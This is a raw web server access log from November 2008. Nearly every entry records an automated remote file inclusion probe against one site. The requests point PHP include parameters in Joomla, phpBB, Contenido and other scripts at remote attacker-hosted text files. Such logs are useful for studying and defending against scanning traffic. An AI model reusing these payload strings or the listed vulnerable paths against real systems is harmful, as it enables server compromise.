72.29.68.244 - - [10/Nov/2008:08:28:30 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:28:31 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:28:34 -0800] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:28:39 -0800] "GET /logs/access_080817.log/errors.php?error=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:40 -0800] "GET /logs/access_080222.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:40 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:40 -0800] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:44 -0800] "GET /logs/access_080222.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:44 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:28:44 -0800] "GET /logs/access_080310.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:28:45 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:28:47 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.204 - - [10/Nov/2008:08:28:56 -0800] "GET /lang_english/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.116.103.35 - - [10/Nov/2008:08:29:00 -0800] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.ekorea.net/forum//include/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.103.35 - - [10/Nov/2008:08:29:00 -0800] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.ekorea.net/forum//include/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.103.35 - - [10/Nov/2008:08:29:00 -0800] "GET /logs/access_081018.log//yabbse/Sources/Packages.php?sourcedir=http://www.ekorea.net/forum//include/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.47.182 - - [10/Nov/2008:08:29:09 -0800] "GET /logs/scripts.log//ws/get_events.php?includedir=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:29:11 -0800] "GET /logs/access_080725.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:29:11 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:29:11 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 200 95189 "-" "Mozilla/5.0" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:12 -0800] "GET /logs/access_080925.log/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:12 -0800] "GET /includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:12 -0800] "GET /logs/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:31 -0800] "GET /logs/access_081007.log/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:47 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.13.218 - - [10/Nov/2008:08:29:47 -0800] "GET /logs/access_080414.log HTTP/1.1" 200 1336556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:47 -0800] "GET /errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:29:48 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:48 -0800] "GET /logs/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:29:48 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:29:49 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.37.24 - - [10/Nov/2008:08:29:53 -0800] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.13.218 - - [10/Nov/2008:08:29:55 -0800] "GET /logs/access_080619.log HTTP/1.1" 200 1769472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:30:17 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:08:30:19 -0800] "GET /errors.php?error=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:08:30:19 -0800] "GET /logs//errors.php?error=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:30:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:08:30:23 -0800] "GET /vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:30:29 -0800] "GET /logs/access_080730.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:30:29 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:30:29 -0800] "GET /logs/access_080530.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:30:30 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:30:31 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:30:31 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:30:33 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.16.174 - - [10/Nov/2008:08:30:34 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:30:35 -0800] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:08:30:46 -0800] "GET /logs/access_081007.log/includes/useragent.inc.php?prefix=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:30:47 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 200 95089 "-" "Mozilla/5.0" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:30:50 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:30:51 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:30:54 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:31:11 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:08:31:54 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:02 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:02 -0800] "GET /logs/access_080512.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:02 -0800] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:13 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:13 -0800] "GET /logs/access_080512.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:32:13 -0800] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:32:19 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:32:19 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:32:19 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:08:32:20 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 200 94756 "-" "libwww-perl/5.805" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:32:24 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:32:24 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:32:24 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:32:24 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:32:37 -0800] "GET /logs/access_080626.log/index.php?url=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:32:38 -0800] "GET /index.php?url=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 94744 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.222.4 - - [10/Nov/2008:08:32:39 -0800] "GET /logs/index.php?url=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:08:33:04 -0800] "GET /logs/access_080817.log/popup.php?path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:33:07 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:33:07 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:33:07 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.194.225.48 - - [10/Nov/2008:08:33:17 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:33:18 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:33:18 -0800] "GET /logs/access_080512.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:33:18 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:33:30 -0800] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.165.84.215 - - [10/Nov/2008:08:33:42 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://controlloid.altervista.org/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.201.48.198 - - [10/Nov/2008:08:33:46 -0800] "GET /logs/access_080629.log/index.php?x=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.48.198 - - [10/Nov/2008:08:33:48 -0800] "GET /index.php?x=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94604 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:08:33:48 -0800] "GET /logs/access_080116.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:08:33:48 -0800] "GET /php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:08:33:48 -0800] "GET /logs/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:08:33:48 -0800] "GET /logs/access_080401.log/php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.48.198 - - [10/Nov/2008:08:33:51 -0800] "GET /logs/index.php?x=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:34:09 -0800] "GET /logs/access_080725.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:34:22 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:34:23 -0800] "GET /phphtml.php?htmlclass_path=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:34:23 -0800] "GET /logs/phphtml.php?htmlclass_path=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:08:34:25 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://189.19.197.103/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:34:47 -0800] "GET /logs/access_080831.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.227.186.29 - - [10/Nov/2008:08:35:16 -0800] "GET /logs/access_081010.log%20/e404.php?DOCUMENT_ROOT=http://www.parcheggi.it/newsletter/Da_cancellare/...??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.85.149.242 - - [10/Nov/2008:08:35:54 -0800] "GET /config.inc.php?path_escape=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.149.242 - - [10/Nov/2008:08:35:54 -0800] "GET /logs/config.inc.php?path_escape=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:02 -0800] "GET /logs/access_080815.log/index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:03 -0800] "GET /index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94616 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:36:03 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:36:04 -0800] "GET /logs/phphtml.php?htmlclass_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:05 -0800] "GET /logs/access_080901.log/index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:36:09 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:36:09 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:36:09 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:18 -0800] "GET /logs/access_080815.log/index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:18 -0800] "GET /index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94632 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:19 -0800] "GET /logs/index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:36:26 -0800] "GET /logs/access_080512.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:36:26 -0800] "GET /logs/access_080208.log//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:36:32 -0800] "GET /logs/access_080208.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:36:41 -0800] "GET /logs/access_080901.log/index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.150.208 - - [10/Nov/2008:08:36:44 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://cogetur.com/meteo/dat/dat.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [10/Nov/2008:08:36:44 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://cogetur.com/meteo/dat/dat.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.26.205 - - [10/Nov/2008:08:36:46 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.26.205 - - [10/Nov/2008:08:36:47 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
